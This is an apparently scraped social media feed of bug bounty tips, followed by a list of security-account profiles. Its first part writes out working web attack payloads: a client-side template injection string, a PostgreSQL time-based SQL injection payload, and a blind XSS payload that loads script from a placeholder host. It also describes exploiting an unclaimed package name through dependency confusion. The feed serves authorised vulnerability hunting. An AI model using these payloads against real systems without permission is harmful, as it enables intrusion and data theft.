#Bugbountytip#Bugbountytips
Install JS Miner extension over Burp
After crawling all endpoints
Click on the target ==> Extensions > Js Miner > Run All Passive scans
I got a result [Js Miner] Dependency Confusion
The package is unclaimed over NPM
Next step
Create an account…
Input field is vulnerable to CSTI however ' and " are converted to HTML entities so simple payload were not working.
Found a Payload:
{{x=valueOf.name.constructor.fromCharCode;constructor.constructor(x(97,108,101,114,116,40,49,41))()}}
#bugbountytips
SQL Injection Payload
i was able to locate a SQL injection very hard to exploit , with digging I successfully got it with the sleep payload
''||(select 1 from (select pg_sleep(6))x)||'
==> i added as well to my SQL wordlist
happy hunting ♥
#bugbountytips #bugbountytip…
My friend made a very interesting disclosure while searching for vulnerabilities. I personally couldn't believe it when I saw that he was able to make Self-XSS in a Ruby on rails application to RCE. Deserves time to read 👇
medium.com/@handball10/fr…
I just published "Exposing PII and SSNs through Persistent Session Tokens - $15,000 Bug Bounty" a new write-up in which I describe:
- My throught process
- My approach when hacking in program campaigns
- Technical details of the vulnerability
shorturl.at/9X9H8…
A mini-thread on how I approached this "Stored XSS with CSP Bypass" together with @confievil and popped it on our second day of hunting on that target (1/x): 👇
#bugbounty
🔖A useful one-liner that extracts all API endpoints from AngularJS and Angular JavaScript files.
✅Join Telegram To Download One Liner -
t.me/brutsecurity/1…#BugBounty#BugBountytips
Blind XSS in Private Target
#bugbountytips
--></tiTle></stYle></texTarea></scrIpt>"//'//><scrIpt src="https://xss/"></scrIpt>
Tip : The payload is always correct; find the right injection point.
10K Followers 1 FollowingUser friendly unofficial HackerOne public disclosures, keeps you updated about the recently disclosed bugs.
Made With ♥ By Hackers For Hackers. - @rohsec
18K Followers 222 FollowingAnda boleh melakukan segala-galanya dari syurga ke bumi, wanita kecil!!
If you have any questions, please contact me
https://t.co/MkzsavUU9V
6K Followers 40 Following🚀 Laravel / PHP Tips | YouTube: https://t.co/ORdNufCN8d | Blogs: https://t.co/yc2lXv5Vdd
🤝 Our dev team is open for outsourcing partnerships! DM open.
37K Followers 503 FollowingHacker, bug bounty hunter, guy behind https://t.co/TBAtP71Cop. 1st in Meta bug bounty program for the last 6 years. YES Team Member
4K Followers 1K FollowingDirector | Trainer at CDAC Under The Ministry of Electronics and Information | Corporate Trainer at Indian Air Force Under the Ministry of Defense ... Jai Hind
51K Followers 601 FollowingFather | Lawyer | Bug Bounty Hunter | Complete newbie | Every Law has its own Bugs. https://t.co/Cwuy2zfF8N https://t.co/Bd9ltJWS5X
187K Followers 6K FollowingThe leading provider of crowdsourced cybersecurity solutions purpose-built to secure the digitally connected world...Unleash Ingenuity™
324K Followers 3K FollowingThe only official HackerOne Twitter account.
A global leader in offensive security solutions. #HackForGood #togetherwehitharder
7K Followers 186 FollowingRanked as the #1 security researcher for Google Play Security Rewards Program. The founder of @OversecuredInc Android and iOS vulnerability scanners
65K Followers 2 FollowingThis is an unofficial HackerOne public disclosure watcher who keeps you up to date about the recently disclosed bugs. By @NOBBD
43K Followers 897 FollowingCo-founder of @centrahq/@detectify/@poweredbyingrid. I do not advertise doing hacking services, do not trust the ones telling you I do.
233K Followers 1K FollowingCofounder @hackinghub_io | Advisor @CaidoIO. I hack companies and make content about it. #NahamCon organizer. ex @hacker0x01🇮🇷
16K Followers 0 FollowingTips and tricks for Burp Suite Pro
Managed by @Agarri_FR | Not affiliated with @Portswigger
More free resources at https://t.co/MWqXmV66lr
37K Followers 184 FollowingNuclei uses a vast templating library to scan applications, cloud infrastructure, and networks to find and remediate vulnerabilities.
52K Followers 616 FollowingGrzegorz Niedziela - a hacker who documents his hacking journey by creating and curating the best content about bug bounty and offensive security.
5K Followers 0 FollowingThis account is created to help to beginners, sharing about Information Security, Hacking, Bug Bounty Tips, IT and interesting write-ups,info sec jobs posts.